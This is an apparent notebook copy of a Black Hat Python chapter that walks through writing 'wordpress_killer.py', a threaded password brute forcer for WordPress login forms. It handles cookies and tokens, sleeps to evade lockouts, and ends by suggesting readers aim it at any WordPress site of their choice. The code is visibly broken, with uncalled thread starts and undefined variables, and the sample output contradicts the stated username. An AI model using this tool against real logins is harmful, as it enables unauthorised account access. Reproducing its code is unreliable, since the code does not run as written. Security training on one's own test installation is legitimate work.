<a href="https://colab.research.google.com/github/damianiRiccardo90/BHP/blob/master/C4-Web_Hackery/Brute-Forcing_HTML_Form_Authentication.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# *__Brute-Forcing HTML Form Authentication__*

There may come a time in your web hacking career when you need to gain access to a target or, if you're consulting, assess the password strength on an existing web system. It has become increasingly common for web systems to have brute-force protection, whether a captcha, a simple math equation, or a login token that has to be submitted with the request. There are a number of brute forcers that can do the brute-forcing of a POST request to the login script, but in a lot of cases they are not flexible enough to deal with dynamic content or handle simple "are you human?" checks.

We'll create a simple brute forcer that will be useful against WordPress, a popular content management system. Modern WordPress systems include some basic anti brute-force techniques, but still lack account lockouts or strong captchas by default.

In order to brute-force WordPress, our tool needs to meet two requirements: It must retrieve the hidden token from the login form before submitting the password attempt, and it must ensure that we accept cookies in our HTTP session. The remote application sets one or more cookies on first contact, and it will expect the cookies back on a login attempt. In order to parse out the login form values, we'll use the __lxml__ package introduced in "The lxml and BeautifulSoup Packages" on page 74.

Let's get started by having a look at the WordPress login form. You can find this by browsing to _http://<yourtarget>/wp-login.php/_. You can use your browser's tools to "view source" to find the HTML structure. For example, using the Firefox browser, choose Tools -> Web Developer -> Inspector. For the sake of brevity, we've included the relevant form elements only:
```
<form name="loginform" id="loginform" action="http://boodelyboo.com/wordpress/wp-login.php" method="post"> [1]
    <p>
        <label for="user_login">Username or Email Address</label>
        <input type="text" name="log" id="user_login" value="" size="20" /> [2]
    </p>

    <div class="user-pass-wrap">
        <label for="user_pass">Password</label>
        <div class="wp-pwd">
            <input type="password" name="pwd" id="user_pass" value="" size="20" /> [3]
        </div>
    </div>
    <p class="submit">
        <input type="submit" name="wp-submit" id="wp-submit" value="Log in" /> [4]
        <input type="hidden" name="testcookie" value="1" /> [5]
    </p>
</form>
```
Reading through this form, we are privy to some valuable information that we'll need to incorporate into our brute forcer. The first is that the form gets submitted to the _/wp-login.php_ path as an HTTP POST __[1]__. The next elements are all of the fields required in order for the form submission to be successful: __log__ __[2]__ is the variable representing the username, __pwd__ __[3]__ is the variable for the password, __wp-submit__ __[4]__ is the variable for the submit button, and __testcookie__ __[5]__ is the variable for a test cookie. Note that this input is hidden on the form.

The server also sets a couple of cookies when you make contact with the form, and it expects to receive them again when you post the form data. This is the essential piece of the WordPress anti brute-forcing technique. The site checks the cookie against your current user session, so even if you are passing the correct credentials into the login processing script, the authentication will fail if the cookie is not present. When a normal user logs in, the browser automatically includes the cookie. We must duplicate that behavior in the brute-forcing program. We will handle the cookies automatically using the __requests__ library's __Session__ object.

We'll rely on the following request flow in our brute forcer in order to be successful against WordPress:
1. Retrieve the login page and accept all cookies that are returned.
2. Parse out all of the form elements from the HTML.
3. Set the username and/or password to a guess from our dictionary.
4. Send an HTTP POST to the login processing script, including all HTML form fields and our stored cookies.
5. Test to see if we have successfully logged in to the web application.

__Cain & Abel__, a Winzozz-only password recovery tool, includes a large word list for brute-forcing passwords called __cain.txt__. Let's use that file for our password guesses. You can download it directly from Daniel Miessler's GitHub repository __SecLists__.
```
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Software/cain-and-abel.txt
```
By the way, SecLists contains a lot of other word lists, too. We encourage you to browse through the repo for your future hacking projects.

You can see that we are going to be using some new and valuable techniques in this script. We will also mention that you should never test your tooling on a live target, always set up an installation of your target web application with known credentials and verify that you get the desired results.

Let's open a new Python file named __wordpress_killer.py__ and enter the following code:

In [ ]:
from io import BytesIO
from lxml import etree
from queue import Queue

import requests
import sys
import threading
import time

SUCCESS = "Welcome to WordPress!" #[1]
TARGET = "http://boodelyboo,com/wordpress/wp-login.php" #[2]
WORDLIST = "/home/rick/bhp/cain.txt"

def get_words(): #[3]
    with open(WORDLIST) as f:
        raw_words = f.read()

    words = Queue()
    for word in raw_words.split():
        words.put(word)
    return words

def get_params(content): #[4]
    params = dict()
    parser = etree.HTMLParser()
    tree = etree.parse(BytesIO(content), parser=parser)
    # Find all input elements
    for elem in tree.findall("//input"): #[5]
        name = elem.get("name")
        if name is not None:
            params[name] = elem.get("value", None)
    return params

These general settings deserve a bit of explanation. The __TARGET__ variable __[2]__ is the URL from which the script will first download and parse the HTML. The __SUCCESS__ variable __[1]__ is a string that we'll check for in the response content after each brute-forcing attempt in order to determine whether or not we are successful.

The __get_words__ function __[3]__ should look familiar because we used a similar form of it for the brute forcer in "Brute-Forcing Directories and File Locations" on page 82. The __get_params__ function __[4]__ receives the HTTP response content, parses it, and loops through all the input elements __[5]__ to create a dictionary of the parameters we need to fill out. Let's now create the plumbing for our brute forcer, some of the following code will be familiar from the code in the preceding brute-forcing programs, so we'll highlight only the newest techniques.

In [ ]:
class Bruter:
    def __init__(self, username, url):
        self.username = username
        self.url = url
        self.found = False
        print(f"\nBrute Force Attack beginning on {url}.\n")
        print("Finished the setup where username = %s\n" % username)

    def run_bruteforce(self, passwords):
        for _ in range(10):
            t = threading.Thread(target=self.web_bruter, args=(passwords,))
            t.start

    def web_bruter(self, passwords):
        session = requests.Session() #[1]
        resp0 = session.get(self.url)
        params = get_params(resp0.content)
        params["log"] = self.username

        while not passwords.empty() and not self.found: #[2]
            time.sleep(5)
            passwd = password.get()
            print(f"Trying username/password {self.username}/{passwd:<10}")
            params["pwd"] = passwd

            resp1 = session.post(self.url, data=params) #[3]
            if SUCCESS in resp1.content.decode():
                self.found = True
                print(f"\nBruteforcing successful.")
                print("Username is %s" % self.username)
                print("Password is %s\n" % brute)
                print("done: now cleaning up other threads. . .")

This is our primary brute-forcing class, which will handle all of the HTTP requests and manage cookies. The work of the __web_bruter__ method, which performs the brute-force login attack, proceeds in three stages.

In the initialization phase __[1]__, we initialize a __Session__ object from the __requests__ library, which will automatically handle our cookies for us. We then make the initial request to retrieve the login form. When we have the raw HTML content, we pass it off to the __get_params__ function, which parses the content for the parameters and returns a dictionary of all of the retrieved form elements. After we've successfully parsed the HTML, we replace the __username__ parameter. Now we can start looping through our password guesses.

In the loop phase __[2]__, we first sleep a few seconds in an attempt to bypass account lockouts. Then we pop a password from the queue and use it to finish populating the parameter dictionary. If there are no more passwords in the queue, the thread quits.

In the request phase __[3]__, we post the request with our parameter dictionary. After we retrieve the result of the authentication attempt, we test whether the authentication was successful, that is, whether the content contains the success string we defined earlier. If it was successful and the string is present, we clear the queue so the other threads can finish quickly and return.

To wrap up the WordPress brute forcer, let's add the following code:

In [ ]:
if __name__ == "__main__":
    words = get_words()
    b = Bruter("rick", url) #[1]
    b.run_bruteforce(words) #[2]

That's it! We pass in the __username__ and __url__ to the __Bruter__ class __[1]__ and brute-force the application by using a queue created from  the __words__ list __[2]__. Now we can watch the magic happen.

### *__HTMLParser 101__*

In the example in this section, we used the __requests__ and __lxml__ packages to make HTTP requests and parse the resulting content. But what if you are unable to install the packages and therefore must rely on the standard library? As we noted in the beginning of this chapter, you can use __urllib__ for making your requests, but you'll need to set up your own parser with the standard library __html.parser.HTMLParser__.

There are three primary methods you can implement when using the HTMLParser class: __handle_starttag__, __handle_endtag__, and __handle_data__. The __handle_starttag__ function will be called anytime an opening HTML tag is encountered, and the opposite is true for the __handle_endtag__ function, which gets called each time a closing HTML tag is encountered. The __handle_data__ function gets called when there is raw text between tags. The function prototypes for each function are slightly different, as follows:
```
handle_starttag(self, tag, attributes)
handle_endtag(self, tag)
handle_data(self, data)
```
Here's a quick example to highlight this:
```
<title>Python rocks!</title>
handle_starttag => tag variable would be "title"
handle_data     => data variable would be "Python rocks!"
handle_endtag   => tag variable would be "title"
```
With this very basic understanding of the __HTMLParser__ class, you can do things like parse forms, find links for spidering, extract all of the pure text for data-mining purposes, or find all of the images in a page.

# *__Kicking the Tires__*

If you don't have WordPress installed on your Kali VM, then install it now. On our temporary WordPress install hosted at _boodelyboo.com/_, we preset the username to __tim__ and the password to __1234567__ so that we can make sure it works. That password just happens to be in the __cain.txt__ file, around 30 entries down. When running the script, we get the following output:
```
(bhp) rick@kali:~/bhp/bhp$ python wordpress_killer.py
Brute Force Attack beginning on http://boodelyboo.com/wordpress/wp-login.php.
Finished the setup where username = rick
Trying username/password rick/!@#$%
Trying username/password rick/!@#$%^
Trying username/password rick/!@#$%^&
--snip--
Trying username/password rick/Oracl38i

Bruteforcing successful.
Username is rick
Password is 1234567

done: now cleaning up.
(bhp) tim@rick:~/bhp/bhp$
```
You can see that the script successfully brute-forces and logs in to the WordPress console. To verify that it worked, you should manually log in using those credentials. After you test this locally and you're certain it works, you can use this tool against a target WordPress installation of your choice.